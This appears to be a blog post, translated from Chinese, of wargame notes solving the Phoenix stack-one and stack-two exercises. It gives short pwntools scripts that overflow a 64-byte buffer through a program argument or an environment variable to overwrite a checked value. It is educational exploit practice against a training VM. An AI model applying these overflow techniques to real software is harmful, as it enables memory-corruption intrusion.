BuringStraw

BuringStraw

HomeArchives

[pwn Notes 1] stack-one and stack-two (Phoenix)

#pwn#stack26
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The post discusses stack-one and stack-two challenges in the Phoenix platform, with stack-one involving copying the first program argument using strcpy and stack-two involving writing to an environment variable. It also mentions the use of pwntools and provides code snippets for both challenges.

These two are very simple, with only a difference in the way data is read. Similar to zero, there are specific requirements for the overwritten data.

stack-one#

Copy the program's first argument using strcpy to a string.

https://s2.loli.net/2023/02/15/P3IYOneKUiS6vNV.png

After running in gdb, directly append the argument to bring it along.

The pwntools sh.run can accept a byte array as an argument, which can include startup parameters. (After checking the documentation, for the run method: Backward compatibility. Use system())

from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)

s = b"a" * 0x40 + p32(0x496c5962)

sh = shell.run(b"/opt/phoenix/amd64/stack-one " + s)
print(sh.recvlines(2))

stack-two#

This time, write to an environment variable.

https://s2.loli.net/2023/02/15/NhRfz7Ciw8UavO4.png

Upon reaching this point, it is noticed that writing "\0" into the environment variable will cause issues. We need to write 32-bit data, so p64 should not be used. If used, it will automatically pad with zeros and then throw an error.

from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)

s = b"a" * 0x40 + p32(0x0d0a090a)
print(s)
s = s.decode()
print(s)
sh = shell.run(b"/opt/phoenix/amd64/stack-two", env={"ExploitEducation": s})
print(sh.recvlines(2))
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.